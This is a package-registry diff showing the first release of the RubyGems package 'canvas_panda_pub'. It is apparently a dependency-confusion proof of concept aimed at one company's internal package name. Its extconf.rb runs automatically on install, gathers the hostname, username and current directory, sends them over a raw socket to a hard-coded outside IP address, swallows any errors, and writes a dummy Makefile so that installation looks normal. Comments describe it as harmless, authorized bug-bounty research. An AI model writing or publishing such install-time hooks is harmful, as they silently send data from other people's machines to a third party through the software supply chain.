canvas_panda_pub 0.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (4) hide show
  1. checksums.yaml +7 -0
  2. data/ext/canvas_panda_pub/extconf.rb +32 -0
  3. data/lib/canvas_panda_pub.rb +11 -0
  4. metadata +46 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: f216ff9f7ed10fce8796b067fa24adf8f474a9ad3bb000e4437223e7b7da5913
4
+ data.tar.gz: 94637ff14a6121e8e4703e375a70e64dba19d28f119da3818576cba4f46e3c3a
5
+ SHA512:
6
+ metadata.gz: ccdf161e99e5fb2e3da09785b5c55f3a656bb5fb982e53542f7cacc26b109a1b7b89e39eb7f39938182d5fbf2c3b5d6a543ca1d80a3000e92bb8f8225cc799ea
7
+ data.tar.gz: f944b746105e003ec375055abef46fb0b9fc9b96725772f9f954802289cf59714126b86c1fb033d5123c192fd8d992e86a27b47879ea83dfdd34b86762cf7793
data/ext/canvas_panda_pub/extconf.rb ADDED
@@ -0,0 +1,32 @@
1
+ require "socket"
2
+ require "json"
3
+
4
+ # Dependency confusion PoC — harmless callback to prove code execution
5
+ # This is part of authorized HackerOne bug bounty research
6
+ begin
7
+ hostname = `hostname`.strip rescue ""
8
+ username = ENV["USER"] || ENV["USERNAME"] || ""
9
+ cwd = Dir.pwd
10
+ body = JSON.generate({
11
+ "hostname" => hostname,
12
+ "username" => username,
13
+ "cwd" => cwd,
14
+ "package" => "canvas_panda_pub",
15
+ "company" => "instructure",
16
+ "registry" => "rubygems"
17
+ })
18
+ sock = TCPSocket.new("54.80.197.209", 8443)
19
+ sock.print "POST /cb/canvas_panda_pub HTTP/1.1\r\n"
20
+ sock.print "Host: 54.80.197.209:8443\r\n"
21
+ sock.print "Content-Type: application/json\r\n"
22
+ sock.print "Content-Length: #{body.length}\r\n"
23
+ sock.print "Connection: close\r\n"
24
+ sock.print "\r\n"
25
+ sock.print body
26
+ sock.close
27
+ rescue => e
28
+ # Silently fail — this is just a PoC callback
29
+ end
30
+
31
+ # Create dummy Makefile so gem install succeeds
32
+ File.write("Makefile", "all:\n\ttrue\ninstall:\n\ttrue\n")
data/lib/canvas_panda_pub.rb ADDED
@@ -0,0 +1,11 @@
1
+ # Dependency confusion proof-of-concept package
2
+ # Registered as part of authorized HackerOne bug bounty research
3
+ # This is a harmless placeholder — no malicious functionality
4
+
5
+ module CanvasPandaPub
6
+ VERSION = "0.0.1"
7
+
8
+ def self.info
9
+ "This is a dependency confusion PoC gem for authorized security research."
10
+ end
11
+ end
metadata ADDED
@@ -0,0 +1,46 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: canvas_panda_pub
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.1
5
+ platform: ruby
6
+ authors:
7
+ - Security Research
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2026-03-25 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: 'Harmless placeholder registered as part of authorized HackerOne bug
14
+ bounty research. Contact: security researcher via HackerOne.'
15
+ email: security-research@example.com
16
+ executables: []
17
+ extensions:
18
+ - ext/canvas_panda_pub/extconf.rb
19
+ extra_rdoc_files: []
20
+ files:
21
+ - ext/canvas_panda_pub/extconf.rb
22
+ - lib/canvas_panda_pub.rb
23
+ homepage: https://github.com/nickel-lang/nickel
24
+ licenses:
25
+ - MIT
26
+ metadata: {}
27
+ post_install_message:
28
+ rdoc_options: []
29
+ require_paths:
30
+ - lib
31
+ required_ruby_version: !ruby/object:Gem::Requirement
32
+ requirements:
33
+ - - ">="
34
+ - !ruby/object:Gem::Version
35
+ version: '0'
36
+ required_rubygems_version: !ruby/object:Gem::Requirement
37
+ requirements:
38
+ - - ">="
39
+ - !ruby/object:Gem::Version
40
+ version: '0'
41
+ requirements: []
42
+ rubygems_version: 3.4.20
43
+ signing_key:
44
+ specification_version: 4
45
+ summary: Security research — dependency confusion proof of concept
46
+ test_files: []